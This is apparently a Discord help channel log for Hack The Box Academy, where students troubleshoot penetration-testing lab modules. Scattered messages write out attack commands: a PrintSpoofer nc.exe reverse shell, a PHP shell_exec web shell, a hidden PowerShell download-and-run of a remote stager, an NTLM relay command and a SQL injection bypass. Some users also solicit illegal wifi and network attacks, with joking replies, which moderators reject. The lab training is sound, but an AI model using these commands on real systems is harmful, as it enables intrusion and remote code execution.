#modules

@fathom pendant dms if possible, i need to re-link i explained the reasoning

Please don't randomly ping people. If you need assistance with a module, just post your question in here. Include the module/section/question you're on.

It's not a module assistance, it's account linking

I cannot do it because i swapped to a discord

Okay, you can DM me

Ofc

Hai guys ,i need any cybersecurity project idea for my final year project , let me Know ? Any stuffs

Best to ask in #general or something. This channel is dedicated for discussion of the modules on HTB. You'll need to follow the instructions in #welcome to gain access.

WHAT THE FUCK DID YOU JUST CALL HIM?

in Dynamic Analysis the .exe that i created works fine with my pc ( av turned on ) but doesn't work in the vm ( the ips and port is right also i tried both udp and tcp vpn ) it doesn't get flagged edit : after trying port 8080 it worked

anyone up?

anyone was able to get a revshell on dc01 for WSUS section in windows lateral movement module ?

sync the time probably?

I relate

was about to say...

actually the first one, I am tryna get the revshell on dc01

no

the WSUS section for windows lateral movement

can I dm so I can show what I have tried ?

Hi! Is anyone doing Using CrackMapExec module? I am using the latest (upgraded to latest commit) NetExec from GitHub and it when trying out the get-network and daclread modules, it gives out errors. However, it's working using the same commands on the Kali Linux NetExec version. Anyone faced this? Thanks.

Hi guys , why is the modules filter not working ?

hello good ppl can you help me please iam trying to solve this " Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio." from Pass the Ticket (PtT) from Linux idk i am stuck !! can you tell me where am i going wrong?

plzz plzz plzz help me out here

I'm so confused about which OS to use, I'm using Kali for last few months but I would like to know what do you guys use, Kali or parrot and why you chose one over the other.

Also why am I not able to chat on #general

both are Debian so i think it is pretty much the same

Yeah, but parrot have pre configured tor and anon surf and Kali lacks them

its up to you with flavour you like

i mean yeah but you can always configure tor yourself on kali if you feel the need

Which one better for opsec?

i use kali and the box on HTB works perfect

I see

Maybe I'm being over dependent on tools

i would say try both see which you like the most

Sounds better 😉

us bro us

hi guys, i have a question. since i cant type in general, i would have to ask here

@acoustic dome @twilit gazelle this is not #general please read and follow instructions in #welcome to gain access there and chat there, please keep this channel on topic

okay, thanks

can anyone help me here

I reckon, one of those files might be a Ticket, wouldn't you agree? maybe use the latest one if the previous ones haven't expired yet...

Oh look we can also see which user and group owns the file

i tried with both the tickets of julio@inlanefreight.htb its same every time :""(

What's the error say?

wait nvm, why are you specifying the /root directory? 😅 check the directory in which the files are located

no error klist: No credentials cache found (filename: /root/krb5cc_647401106_" after i export it

ohh let me try :""((

omg it worked thank youuuuu so much\

Hi

What you're asking for is illegal and against our #rules here

May i ask about questions in Password Attack module? It about days i stuck in that questions

Don't ask to ask, just ask your question

About questions in Password Attack module? It about days i stuck in the both first questions

Yeah just ask the question

Questions in Password Attack module... What are the answer for the both first questions

Please who knows how to hack

Why? What do you want to ask a person who knows how to hack?

To be sure to be in a good group

#1318239802931286066 if you dont have access go get identified, instuctions in #welcome

D'accord

How can we offer some feedback on a module?

There is a feedback command. / feedback

For Attacking Common Services | Attacking Email

I've attempted to brute-force credentials for smtp, pop3, imap, and tried o365spray - I didn't get results for any of the services. Could I get a hint? Possibly non-default port?

hi, anyone could give me a nudge on 'password attacks' module?

I can try, whatcha got

specifically on Pass The Certificate

What do you need a nudge on?

this error, when running ntlm-relayx

What's the syntax you used to run it?

impacket-ntlmrelayx -t http://IP/file.asp --adcs -smb2support --template KerberosAuthentication

for -t did you use CA01

yes

Is it in your hosts file?

yes

what's the .asp file you put in there?

Just google it. https://github.com/fortra/impacket/issues/1716

Why can’t i start chatting in general?

read #welcome carefully

In the student subscription "Direct access to all modules up to (including) Tier II" Means I get to use all the modules with no cube cost and get the cube rewards? Also what happens when the subscription is over. Do I lose access to all of those modules or only incomplete ones?

all modules up to Tier II are immediately available to you. you will not need to spend cubes to unlock them. you also still receive the cube rewards for completing modules. when your subscription ends, any modules you complete are yours forever, including updates. modules that are incomplete/not started will be locked

Thank you! So it seems to be worth it when comparing the price with the other subscriptions?

there is no better value subscription on the platform

Hi, I ask information about the first step to escalation with PrintSpoofer64. I make all step but when run this command:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c “c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd”
I receive this error:
172.16.8.20[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
CreateProcessAsUser() failed. Error: 216

I think it's a problem with the version of netcat so I tried another one, but it doesn't work any better

Anyone can help me please ?

anyone available to give me a nudge onthe Passwords Attack module?

I think you should change this IP 172.16.8.120 to your own

This is the good one (IP of my target where i started a netcat listener)

hmm, then I have no idea :((

Have you tried another port maybe?

I just tested it, but it doesn't work any better.

Hi guys pls if someone has done the wordpress hacking module im stuck in the flag when exploiting a Local File Inclusion vulnerability Ive finished the module but i couldn't find that single flag idk how im supposed to know its name to read it...

https://academy.hackthebox.com/module/17/section/64

Hi
Am not able to ping windows boxes in Password Attack module. I tried changing vpns, tried pwnbox as well. Doesn't work, is this a bug or somehting?

Try using nmap with the -P0 flag it might be the box doesn't respond to ICMP pings

Username seems accurate 😭

Hello can anybody give me a nudge on "Linux Privesc Skill assessment ---> Flag # 3".
Been enumerating and trying exploits but they don't seem to work, been stuck for quite a few hours on this flag

Hi I am currently doing the windows attack and defense module from the SOC Path.
In the section on kerberoasting they say we need to connect to DC1 on IP 172.16.18.3 but I am unsure how to do that I am on my personal kali VM and connect via VPN. I used RPD to connect to the WS001 machine for the first question but I am unsure how to continue.

Sorry if this a dumb question. I can ping the IP address from the WS001 machine

have you tried ping DC01 ?

hey dude thanks for it! i was losing my mind over it lmao

yes I am able to ping it I should have made it clearer

why do you even need it??

if you ping it and you get another IP, connect to that ip from the WS001 machine

Can anyone tell me how to hack my own wifi

contact your provider

WPS button is the best

+1

you dont. you already know the password

May be he don't

if youre connected to any phone click on wifi name and scan the qr

I tried the handshake method

But it didn't work

It's actually my brother's hotspot

wifi hotspot settings, click on that eye thing boom!

Evil twin method try it if more people are connected to the hotspot

Bro I think he doesn't has access to his phone

he needs to hack the phone not the wifi now

He said if I hacked it he will give me 40bucks

He need only the wifi

I was hoping I was not going to need to double up on my RDP session . As a follow-up not sure if you have the module open but in the lab they use a kali with a password.txt file for cracking the the kerberos hashes which i dont have obviously. Is there some kali machine I could log into or is the machine in the pictures just for demonstration purposes?

😭

hack his brain, get a shell now you have access to his paypal send yourself 80 bucks

Social engineering

😂

+1

Wtf does this +1 mean?

I only got an esp and a slow lap

check if in resources there is that password.txt file

Which esp?

32 devkit v1

"i agree"

Ooo

You can do an evil twin method with that if you have antenna attached to it

I think so not sure

if its a weak password, do a dictionary attack

+1

can you clarify what you mean by check in resources. sorry I have not been on the platform itself for long.

on the page your on, look in the top right corner

ah ok thank, but no its not there

@fresh oracle Discussion of illegal activity is not allowed here. Please read the #rules.

@west arrow Please refrain from posting content from modules above tier 0.

mybad sorry

Can anybody give me a nudge on "Linux Privilege Escalation Skill assessment ---> Question/Flag # 3".

Been enumerating and trying exploits but they don't seem to work, been stuck for quite a few hours on this flag

Hey, did anyone ever get the error [X] Error executing the domain searcher: A local error has occurred. when trying to kerberoast cross forest with rubeus?

Never mind, found it, im so dumb

Answer required in Password Attack Introducing John The Ripper module... What are the answer for the both first questions?

Why is the final task in shells & payloads an absolute torture? Why can't we use our own systems. The initial "foothold box" is absolutely inconvenient to use...

if you know how to set up a pivot; you can do that

no, i do not know how to do that. i have my own machine with tools that flies fast. i just ragequit because i cannot suffer this task anymore, it's too slow

Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>? I'm getting u"ㅈÀ" but it's inccorect

try changing vpn regions, use tcp instead of udp

your gdb may be stepping in hex not decimal

+16 -> +10 in hex

idk what i'm doing wrong

Hello

try stepping one at a time; it's been a minute since i've done this one

Are you the mod? I got a notification that my name changed

likely because your name contained non-ascii characters making it harder to @ you/take actions

ah i see

i think theres a slight misunderstanding. the command he injected was <?php echo shell_exec($_GET['cmd']); ?> instead of the other one where you do <?php system... and then $_GET. unless you actually mean that command is literally using bash to do something with echo which i do not understand.

||also the php system one would crash the skills assessment.|| not gonna say where cause it might be a spoiler

shell_exec and system do practically the same thing

there's some minor differences

im just wondering why it was enough to accidently crash the server and make the path inaccesible. I think thats vague enough to not give away any clues

since its all about file inclusions and path could mean anything

¯_(ツ)_/¯

I did got stuck in the same lab Footprinting-easy. How did you found the flag?

Hi there,please i need someone to put me through hack the box I don't have money to get cubes how do I accumulate more cubes cause for free so I can get ,ore modules please can anyone here render help to me ?

Where did u get stuck ?

Anyone got a sec to help with Attacking Common Services | Easy Skill Assessment

I was able to find a user, and have enumerated most of the options, except for one [SQL] when trying to do so, I encounter these errors

└─$ mysql -u <user I found> -h 10.129.16.20 ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

I then tried

└─$ mysql -u <user I found> -h 10.129.16.20 --skip-ssl ERROR 1045 (28000): Access denied for user 'fiona'@'my vpn IP' (using password: NO)

NOTE: This login had worked before I went to lunch. I came back, restarted the box and now I am encountering this. Even after a couple of machine resets

EDIT: Had to change syntax after troubleshooting to include the pw in the login command

i cant understand how to get tomcat credentials in shells and payloads: live engagement

Desktop

yooo

now i feel dumb

hi i am in attacking domain trusts cross forest from linux section , in Active Directory Enumeration & Attacks module and while i ran the Getspnusers i got

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

can't install ntpdate

if anyone could help , i would appreciate it

Note : i got the users just not the hash

yo guys
im on ACL enum, and one of the questions requires me to get the GUID from the AD right
the section mentions how to get the right from the GUID using Get-ADObject or -ResolveGUIDs with powerview, but not the opposite
any idea

I'm not getting what to do. I did logged in ftp it's not showing any files or directories and I'm unable to login ssh .

Are you logged into the right ftp?

hi guys do u also have problems with the academy vpn?

since yesterday i ve had no acces to the academy vpn whatsoever

are the vpn servers down?

in the ovpn file there should be a host it connects to; try pinging that host

Can anybody tell me what STDNT in linnux means?

I'm doing hack the box and iam stuck on the section STDNT

that really doesn't help or explain the issue

Okay hold on.

How many files exist on the system that have the ".log" file extension?

Here is the question? Is this related to stdin?

Yeah

They did gave the credentials for the lab

that wasn't the question i asked 😉

help

Yeah I did logged in correct ftp. There is a firewall that's blocking the connection

ftp> ls -R
229 Entering Extended Passive Mode (|||46679|)
150 Opening ASCII mode data connection for file list
226 Transfer complete.I'm getting these while I running the commands

Im in attacking web applications with ffuf module, in the assessments section the extension fuzzing is expecting another diff extension idk what I'm doing wrong

passive
binary
ls

Need a nudge on Attacking Common Services | Easy Skill Assessment

Don't want to give away spoilers either, so please delete if not allowed.

Found the foothold and have found that the use of ||LOAD_FILE|| seems to work, however, I can't get a shell to pop... Any hints?

I asked this in the community help zone but that might be the wrong place.

I'm on the AI red teaming path on Direct Prompt Injection 1.

The flag I get says it's incorrect for the answer. I've tried multiple connections and box resets but I get the same flag each time regardless.

sorry Im typing this here

how do I solve this error This Account Identifier does not appear to be the right length (must be 60 characters long).

I’m having the same problem too 🥲

are you connected to the right port

It's looking like the majority of the prompt injection flags are incorrect at this point

Solved, apparently i just threw in another extension which DIDN'T EVEN APPEAR WHEN I FUZZED ON THOSE SUB DOMAINS.

pinged that and recieved reponse from a different address and when i still try to connect i get this in my openvpn error C2025-07-16 23:55:14 RESOLVE: Cannot resolve host address: edge-eu-academy-3.hackthebox.eu:443 (Temporary failure in name resolution)

sometimes the temp is just temp and it'll resolve after a sec

this keeps on going forever, tried to switch servers, protocol, everything and still nothing

Yes

reach out to support then

Hi everyone. Can someone give me a nudge on LLM Output Attack Skills Assessment? Thanks!

Watch this guy he explains it very well

https://youtu.be/FwOTs4UxQS4?si=dhM-WHqW4WF4V3RH

Hi

@plain oasis thanks and sorry:) (I don’t mean in bad way)

Sorry, not sure what you mean. This is an AI Agents explanation video. I'm stuck on how to complete the Skills Assessment for the LLM Output Attack Module.

’m on page “<tabTitle>Network Foundations</tabTitle>” with “<selection>+ 0 What RFC specifies private IP ranges? </selection>” selected.

I dont know how to answer thsi question,

Check the reading carefully

Ctrl+f for rfc

I mean the format,
This the answer of the question

Defined by RFC 1918, common IPv4 private address ranges include 10.0.0.0 to 10.255.255.255, 172.16.0.0 to 172.31.255.255, and 192.168.0.0 to 192.168.255.255

They highlighted this sentence in the solution section, but i dont know how the answer should be written

"What rfc defines private ip ranges" its asking for the rfc #

Thanks

Hi has anyone here done the wifi modules and I know this sounds dumb but if I want to do wifi modules will I be able to get help on those too or has no one done them?

Like I don’t plan on doing them right now necessarily but I am interested in doing them in the future

When I have tier 3 access to academy because eventually I’m gonna upgrade

Because I know most wifi modules are tier 3

The Correct one is : tom ' OR '1'='1 > in the username and you leave the password empty. you can understand it this way.

anyone knows that's the problem might be?
the Target(s) are spawning... takes forever.

Hey y'all

@feral temple not what this server is about. That's illegal

My bad

Won't happen again

Good afternoon, everyone. This is my first time seeking help. I am currently in the Password Attacks module. All the mutation lists I have created are large, and it seems like the Hydra Tool does not have a chance of validating the entire list in two hours. I have already cut the list into chunks, but no luck yet. Any suggestions?

Make sure you write mutation rules that make sense

@barren apex When that happens to me, Windows+Key and R, and then, %temp%, and delete all temps... and re-start the computer...

ok 👀
thanks

Answer required in Password Attack session in Introducing John The Ripper module... What are the answer for the both first questions?

@fathom pendant Well! I am trying to mimic the same format of the example Password I received as Information "Texas123!@#" - One word, 3 numbers and 3 Symbols...

Well .. the only thing u need to know is " are u sure its empty?(Ftp)"

hey all im working on the last question on.

"AD Enumeration & Attacks - Skills Assessment Part I"

It wants me to perform a dcsync however the cleartext creds i got for the user dont seem to let me auth to the 1st target, MS01 (2nd target) or the DC.

they seem to be the correct set of creds since the previous answers accepted them but feel like im missing something basic here and looking for a hint.

Authentication isnt always rdp

i actually never tried RDP, i went with SMB

also psexec

so far i can SMB and psexec to ms01 with the previous account password found, so all my tunnels seem right just seems like creds are the issue but the creds i used for the questions were right 🤔

Hi Guys. I'm actually stuck on Skill Assessment of Password Attack Module and I need some hint. It seems that the user that I have (hw...) don't have the right privilege to do what I think that I need to do in jump01 (pr::). I already enumerate the other users from domain but without success about the pass. I already enumerate the other proto and found more files, but my file enumerating technique seems not working very well through the pivot. Am I on the right path?

Make sure its not some case sensitivity thing being dumb

Shares are interesting

Snaff can point to a file

Ok. I send snaf to J and ran it. Let me look to it again and again. Ty!

Not to j

i mean im copying in pasting form terminal and from what i submitted as well

I ran from J against F

But hw has access to files

The finding is labeled {black}

hi

anyone facing issue where upload files button not working lol?

any help would be appriciated 🙂

There may be something else that's vulnerable which is the path forward

@tulip minnow Please read the rules and do not DM people without permission.

sorry i just asked him to check #modules didnt know wont do it again

It's in the #rules

ty @fathom pendant for the hint of {black}. I was a little confused about that whole output, but with this hint and following the trail, I was able to finish the skill assessment.

Hello guys. I'm struggling with cracking these hashes in the Active Directory Module for the LLMNR poisoning from windows. I have 6 outputs from running responder. I put them into a file and I'm running "john hashlist.txt --format=netntlmv2 --wordlist=...."

I'm not sure if the command doens't work, or if the wordlists ive tried just don't have the passwords or what... but I was looking for guidance on if I'm missing something. I've gotten used to john for cracking hashes... do I have to use hashcat, or does it not make a significant difference? Thanks in advance.

which wordlist did you use?

Off the top of my head: xato top 100k (maybe its a million?), common passwords list, and a few others from seclists.

if one isn't provided the first one i'd try is rockyou

try that if you haven't

it's generally the 'default' list

Is rockyou in seclists? When I try to locate it in my VM I dont see it, so I assume its not? Im on my phone and will try tomorow. Just trying to get pointed in the right direction for now.

i don't think so. on kali i think you need to unzip it first. just try something like locate rockyou

What does the * denote here? I tried locate rockyou and nothing showed. So I might need to hunt it on github

yeah don't use it

just do locate rockyou

it looks like it is in my seclists, but it's zipped up

Ill double check it tomorrow... whats the linux tool used to unzip stuff?

Anyone who talks about TryHackme is a traitor?

Huh? This channel is for discussion of the various modules on HTB, nothing else. If you'd like to discuss THM it isn't disallowed but this isn't the channel. You'll need to read the #rules to gain access to other channels like #general or #careers-and-certs etc.

Hi Guys. I’m stuck on the Skills Assessment of the LLM Output Attack module. Can anyone assist me on that? Thanks!

hello guys can anyone help me with information gathering -web edition: fingerprinting

i am stuck i did as per the instruction but i dont get back cur, wafw00f or nikto response

I- I looked at all of it I still can't find a way to get in general

Follow the instructions in #welcome to verify your account to gain access

anyone can help me in information gathering - fingerprinting

1. added the ip and subdomain to vhost file
2. used curl
3. used wafw00f
4. usd nikto
   nothing is working

which question?

first question

dm me screenshot of /etc/hosts file

ok

i cant dm you @wooden seal

Pentest in a nutshell
Windows VA (submodule)
cant rdp to target
getting timedout for some reason
error:
[11:20:22:802] [1967:1968] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0 [11:20:22:803] [1967:1968] [WARN][com.freerdp.crypto] - CN = [11:20:32:483] [1967:1968] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation [11:20:32:487] [1967:1967] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

are you using parrot or your own vm

its solved

Guys I am Having a problem in a academy module named "Network Foundations" and I have done all the section and the final section is left called "Skill Assessment"

This section has like 3 chapters in it to solve the assessment but I am having the problem in third chapter

nc -v 10.129.174.32 21
10.129.174.32 [10.129.174.32] 21 (ftp) open
220 Microsoft FTP Service
USER anonymous^M
331 Anonymous access allowed, send identity (e-mail name) as password.
PASS anything^M
230 User logged in.
PASV^M
227 Entering Passive Mode (10,129,174,32,194,11).

after this command I had to open an another terminal and connect to the FTP data channel I HAVE ALSO calculated the dynamic port by last two number and I gave the command to the next terminal but this is I am getting . Can anybody help

nc -v 10.129.174.32 49675
10.129.174.32 [10.129.174.32] 49675 (?) : Connection refused

Got u I will find it

i am using my own vm

honestly i hated this bit; it's best to just connect via the normal means of using ftp

i connect to academy from virtual box, i can ping the traget but cant curl what is the issue

i think hack the box is disaster to subscribe

i cant even do it from attack box

Are you running the pwnbox and your vm at the same time?

no i tried in pwn box after i failed in my vm

i failed in both

@fathom pendant

You don't have to @ me

sorry

forgive me

Try changing vpn regions and downloading a new vpn

ok

I am new so that's why I am following whatever it is told in the module section

Hi, I am doing the Attacking Enterprise Networks module and I am stuck on the Internal Information Gathering part. Here is what I did:
In the OpenVPN / Pwnbox I tried both of them and have reset the target machine and the pwnbox 2-3x times, I also regenerated the OpenVPN file:
ssh -D 8081 -i dmz01_key root@machine_ip

netstat -antp | grep 8081
Output: tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN 122808/ssh

grep socks4 /etc/proxychains.conf
Output: socks4 127.0.0.1 8081

Now the next command is to use Nmap with Proxychains to scan the dmz01 on its' second NIC, with the ip 172.16.8.x
This is the expected output:
ProxyChains-3.1 (http://proxychains.sf.net/)
Starting Nmap 7.92 ( https://nmap.org/ ) at 2022-06-21 21:15 EDT
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:22-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:21-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.x:8080-<><>-OK
Nmap scan report for 172.16.8.120
Host is up (0.13s latency).

PORT STATE SERVICE
XX/tcp open XXX
XX/tcp open XXX
XX/tcp open XXXX
XXXX/tcp open XXXXXXX

But for me it just:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-07-16 14:22 CEST
Nmap scan report for 172.16.8.120
Host is up (0.00060s latency).

PORT STATE SERVICE REASON
XX/tcp filtered ftp no-response
XX/tcp filtered ssh no-response
XX/tcp filtered http no-response
XXXX/tcp filtered http-proxy no-response

Nmap done: 1 IP address (1 host up) scanned in 1.31 seconds

sorry for the long message, i copied it from #1024429874246590575 where I first posted it

MarcieLee said not to worry about the state, but I don't know :((

you could just upload nmap and run it internally

https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap

thank you, ill try

it'll work

or you can use ligolo it'd probably work

it worked THANK YOUU<3

Hi all i have huge problem with module SQLMap Essentials

I don't even know if i have problem with connection.

Everytime when i want to solve tasks (for example Case #2) during my attack sqlmap can't connect to target page. i have communications like

[05:28:25] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[05:28:25] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
[05:28:25] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)

endless loop

trying to do case#2
sqlmap 'http://94.237.57.211:49442/case2.php' --data 'id=1'
sqlmap '94.237.57.211:49442/case2.php' --data 'id=1
sqlmap 'http://94.237.57.211:49442/case2.php' --data 'id=1'
sqlmap 'http://94.237.57.211:49442/case2.php?id=1' --batch --dump
sqlmap 'http://94.237.57.211:49442/case2.php' --data 'id=1*&name=test

nothing works. Any hints?

Check dms

$ sudo mysql -u root -h 83.136.253.59 -P 55835 -p

Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

┌──(kiki㉿kali)-[~/mysql-ssl]
└─$ mysql -u root -h 83.136.253.59 -P 55835 -p

Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

why this happened to me ?

hi, can i get some help with the penetration tester path/password attack/last cuestion? im unable to make the dc do send a shell using powershell

pablo motos el hacker

I have a question also in the Password Attacks module, specifically the Pass the Certificate section. How were you able to obtain the admin flag?

havent gotten there

Then let me just ask because I've been stuck since yesterday and both my tricks and the walkthrough aren't working.

could you help me with mine?

Which section exactly in the Password Attacks?

pass the hash, last cuestion, not the optional one, im unabkle to make the dc send the shell or the windows to get it idk

--skip-ssl

Hey! here: https://stackoverflow.com/questions/68854953/repeated-base64-encoding-differs-from-expected-result

im on that right now, I need help

ssh htb-student@ip

I need help

How can I heck my network so that the users in my LAN can get slow internet speed

Please help me in this regard

This has nothing to do with the Academy modules.
Read and follow #welcome to get access to better channels for your question

i have a problem with the nibbles box

when i go to ip-address/nibbleblog it just keeps loading and doesnt show anything

its part of the getting started module

Any help on the LLM OUTPUT ATTACKS, skill assessment??

Hey , how to have the permission to write in "general" ? Like is there a privilege Escalation for it ?

#welcome follows steps

Okay command sqlmap works well on HTB PWN box... but not on my Virtual Machine when i connecting with HTB via SVPN / tun0. Anyone knows why? Any hints on switch on sqlmap?

Thank Sir

used same commands mentioned above? on pwnbox

nvm it works on pwnbox

yeah exacly same

*excactly

nvm its not working again 😭

anyone?

hello, i cannot find any reports, please provide insight. @ me\

Do some research and find examples of penetration test reports and pick out the essential features. Get an overview of the following:

1. What topics have been covered?
2. How are they structured?
3. How are they presented?

https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://purplesec.us/wp-content/uploads/2019/12/Sample-Penetration-Test-Report-PurpleSec.pdf&ved=2ahUKEwj47cq5gsSOAxX0wzgGHU7CJJAQFnoECAsQAQ&usg=AOvVaw35efjSA-Q3bWXnENwgb0WK

https://purplesec.us/wp-content/uploads/2019/12/Sample-Penetration-Test-Report-PurpleSec.pdf cleaned version

Hi guys, I do need some help. I am stuck on the last flag of the skills assessment of Web Proxies module. I have tried a lot of different things but it is impossible to send the metasploit requests into ZAP for further modifications. I have configured /etc/proxychains, I launch msfconsole with proxychains in front of it. I set Proxies in metasploit and in ZAP (both are the same)...I think I have tried everything I could at this point. If someone has an idea I would like to ear it 🙂 I am running ubuntu and connect to HTB via the VPN.

Hi. Probably there are more then one way to complete the exercise, and maybe you didn't need a rev shell

would thank a little help tbh

what is ?

this

the worst module i ever studied "linux privesc" machines are damn slow

and not working properly, i am root but "permission denied" ?

please help

Hi everyone, I'm having a lot of trouble with an exercise in the bash module (https://academy.hackthebox.com/module/21/section/128). I've been trying to solve it for over an hour. I asked chatgpt for help, but the flag variable either returned empty or this error occurred:
*** WARNING: Deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
40273C44B57F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
I don't know what to do.

I talked a little more with chatgpt. His response was that the flag returns empty.

https://academy.hackthebox.com/module/51/section/1592
I got stuck here
I tried linpeas too
cant find anything useful

this can be solved completely without linpeas or similar

what have you checked so far besides automated scripts?

etc/passwd , env , /etc/groups , /home , df -h , whoami , id , echo $PATH, uname -a

any a few more

I dont like automation tbh

How do you check which binaries you can run as another user or as root?

sudo -l

right. This is your biggest hint. Go from there

alright

Don't rush the solution. Look at the output carefully, not to make any quick false conclusions

got it sir!!

in case you get stuck feel free to ask again

heyy guys

i got stuck in pwn chall r0b0b1rd not totally but in a specific part

where are you stuck and what info do you have?

do u want me to dm u ?

so i don't spoil anything or sthg

#challenges is a better place to ask

if you don't have access read #welcome

hi, i'm doing Intro to C2 Operations with Sliver and am at the Assmued breach section using sharpsist when I run sharpersist -- -t startupfolder -c \"powershell.exe\" -a \"-nop -w hidden iex(new-object net.webclient).downloadstring(\'http://10.10.x.x:8088/stager.txt\')\" -f \"Edge Updater\" -m add I get not output

output:

it doesn't work and I tried it using a beacon and session

also tried to execute-assembly and use the stand alone SharPersist.exe with no luck

is anyone doing the AI modules and indirect injection?
Feel free to DM, I'm having issues with the flags (not asking for them to be clear, I have them but they won't submit so curious if I'm missing something).
Support has been contacted but it's extremely slow with responses so reaching out to the community again

module :- INFORMATION GATHERING - WEB EDITION
DNS Zone Transfers

i need to perform a zone transfer for inlanefreight.htb but i cant figure out the nameserver

The name server is your target server

Just use this IP as nameserver

Nameserver is the target ip
dig command @ip

but arnt the name server always like ns1,ns3

Nameserver are dns server so any computer serving dns is a nameserver

hm

You can name your nameserver whatever you like.

so from so long i was trying to find ns server of an ns server

same xd i havent been able to get it

penetration tester path, password attacks module/ pass the hash

I can get the reg to work but not the startup folder

Figured it out! You can't do the startup folder in a system beacon you need to be a user. I get why now.

Moderators, ban this guy already

You're right anyone can access their insta acc with their username and password when they login.

hello, is there any other way of detecting user/domain recon with splunk other than:

1. Detecting Recon By Targeting Native Windows Executables
2. Detecting Recon By Targeting BloodHound

How to get access to channels like general, htb-pets, etc..?

I can't chat in those

Go to Browse Channels and follow them

Hello, If I buy the monthly plan and receive 200 cubes, will the modules I unlock with those cubes be lost after the subscription expires?

Oh my mistake, I can't do it either

when i try to assamble mov.s i get mov.s:9: error: parser: instruction expected

mov.s

global _start

section .text
_start:
    mov rax, 1024
    mov rbx, 2048
    xchg rax, rbx
    push rbx

You'll need to read the #rules and follow the instructions in #welcome to get access.

Thank you!

https://help.hackthebox.com/en/articles/5720974-academy-subscriptions#h_d0354c1221

this means I still access my courses inspite of expiration?

If you complete a Module with an access-based subscription, you will still have the ability to go back and review that module, even after your plan ends. Keyword being complete, unless I am mistaken.

Can anyone teach hacking here ?

Therefore If I do not complete my module, I can not review it when my payment is expiration ?

That sounds right. I recall working through a skills assessment for a module and my student subscription ran out. I was then not able to access it without using cubes, even though I was at the end. Now if I had finished that module before the subscription ran out, I would still have access to it. Plan accordingly.

Do I have to complete all my lab, tick "Mark complete and Next" and do skill assessment to verify that I have completed my course?

Yeah when you complete the module, you will receive a congratulatory message and virtual badge for completing the module.

Thank you so much. I have just started with this so I do not no much

All good and don't sweat it, I learn something new everyday here.

Hey there, I am trying to do the setting up module but have found that VirtualBox on a Windows host will not expose Intel VT‑x, has anyone found a way around this or is it just a matter of either installing linux or using different software?

Yeah. That's what the Academy is for. https://academy.hackthebox.com

Hi. Is it possible to share the SOC analyst path archivement on Linkedin as a 'license or certification'? I understand the CDSA cert is. But what about the path? Offsec allows to share the path archivement

You mean the badge? Sure, you can share it wherever you want. There is even a share function

hey

Hello

Hi all,

Looking for a bit of a nudge in the right direction, trying to find the htb-student's mail file location. Feel like I am missing it somewhere obvious but any tips on where to search or a useful command is appreciated (Keen not to be given the answer, would still like to find it on my own)

Where can do a reqeust for hacking something? 😌

Hi
Please read #rules #faq and #welcome

Oké…

Anybody have any tips. I just got parrot os on my phone and don't know what to do with it

Rclone looks fun

i would advise you using a laptop/computer

Solved it

Has anyone used windows Hyper-V to install Proxmox onto instead of VirualBox? Because I have an intel chip and VirtualBox on a Windows host will not expose Intel VT‑x I can't use it

you don't need to follow the setting-up module to a T

Does that mean I do not need to install Proxmox or that I should just use Hyper-V? Sorry quite new to this

Proxmox seems useful if we will need to create many VMs

I'm really not sure what I'm missing here. Very stuck.

re: RDP and SOCKS Tunneling with SocksOverRDP
I have established the SocksOverRDPx64.exe server running on the pivot, and have confirmed that the foothold sees it (confirmed via netstat).
When I try to connect to the final host (from foothold, with Proxifier running and configured) (or use Proxychecker.exe), I see that the connection is "actively refused".
Defender + firewall are both disabled on both foothold and pivot. Any advice on what I'm missing here please?

This suggests the proxy server is working correctly on the correct host, right? So why can't proxifier establish a connection on the listener? doesn't make sense

which lab is this

??

"RDP and SOCKS Tunneling with SocksOverRDP"

In Pivoting, Tunneling and Port Forwarding

this is a silly exercise when I can just RDP directly from the pivot to the target and get the flag anyway. But i'm annoyed that it isn't working when configured as above

module?

nice troll

HAHAHAHAH

whats the module name i acc wanna have a go at it'

looks nice

read msg

Saw it sorry I missed it

Hacking needed?

Does HTB have a lessons about Using Burp suite?

Proxmox works best on its own system

there's a module about using proxies, it goes over burp and zap

So is it not needed for many things? It seems really important in the setting up module

it's not as important as you think

the setting up module is just broad strokes of different things you CAN set up, but don't have to

